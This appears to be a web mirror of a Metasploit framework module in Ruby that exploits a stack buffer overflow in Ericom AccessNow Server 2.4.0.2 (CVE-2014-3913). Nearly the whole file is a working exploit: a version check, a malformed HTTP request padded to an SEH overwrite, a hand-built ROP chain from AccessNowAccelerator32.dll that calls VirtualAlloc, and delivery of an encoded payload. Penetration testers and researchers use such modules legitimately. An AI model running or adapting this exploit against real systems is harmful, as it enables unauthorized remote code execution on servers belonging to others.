CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/ericom_access_now_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Ericom AccessNow Server Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a stack based buffer overflow in Ericom AccessNow Server. The

16
        vulnerability is due to an insecure usage of vsprintf with user controlled data,

17
        which can be triggered with a malformed HTTP request. This module has been tested

18
        successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003

19
        Server SP2.

20
      },

21
      'Author'         =>

22
        [

23
          'Unknown', # Vulnerability Discovery

24
          'juan vazquez', # Metasploit Module

25
        ],

26
      'References'     =>

27
        [

28
          ['ZDI', '14-160'],

29
          ['CVE', '2014-3913'],

30
          ['BID', '67777'],

31
          ['URL','http://www.ericom.com/security-ERM-2014-610.asp']

32
        ],

33
      'Privileged'     => true,

34
      'Platform'       => 'win',

35
      'Arch'           => ARCH_X86,

36
      'Payload'        =>

37
        {

38
          'Space'    => 4096,

39
          'BadChars' => "\x00\x0d\x0a",

40
          'DisableNops' => true,

41
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

42
        },

43
      'Targets'        =>

44
        [

45
          [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',

46
            {

47
              'RopOffset' => 62,

48
              'Offset' => 30668,

49
              'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll

50
            }

51
          ]

52
        ],

53
      'DisclosureDate' => '2014-06-02',

54
      'DefaultTarget'  => 0))

55


56
    register_options([Opt::RPORT(8080)])

57
  end

58


59


60
  def check

61
    res = send_request_cgi({

62
      'uri' => '/AccessNow/start.html'

63
    })

64


65
    unless res && res.code == 200 && res.headers['Server']

66
      return Exploit::CheckCode::Safe

67
    end

68


69
    if res.headers['Server'] =~ /Ericom AccessNow Server/

70
      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4

71
    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/

72
      return Exploit::CheckCode::Detected # Ericom AccessNow 3

73
    end

74


75
    Exploit::CheckCode::Unknown

76
  end

77


78
  def exploit_uri

79
    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message

80
    uri << rand_text(target['RopOffset'])

81
    uri << create_rop_chain

82
    uri << payload.encoded

83
    uri << rand_text(target['Offset'] - uri.length)

84
    uri << rand_text(4) # nseh

85
    uri << [target.ret].pack("V") # seh

86


87
    uri

88
  end

89


90
  def exploit

91
    print_status("Sending malformed request...")

92
    send_request_raw({

93
      'method'  => 'GET',

94
      'uri'     => exploit_uri,

95
      'encode'  => false

96
    }, 1)

97
  end

98


99
  def create_rop_chain

100
    # rop chain generated with mona.py - www.corelan.be

101
    rop_gadgets =

102
      [

103
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3

104
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3

105
        0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]

106
        0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]

107
        0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]

108
        0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]

109
        0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]

110
        0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]

111
        0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]

112
        0xffffffff, # Value to negate, will become 0x00000001

113
        0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]

114
        0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]

115
        0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]

116
        0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)

117
        0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]

118
        0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]

119
        0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]

120
        0xffffffc0, # Value to negate, will become 0x00000040

121
        0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]

122
        0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]

123
        0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]

124
        0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]

125
        0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]

126
        0x90909090, # nop

127
        0x1052cfce  # PUSHAD # RETN [AccessNowAccelerator32.dll]

128
      ].pack("V*")

129


130
    rop_gadgets

131
  end

132
end

133


134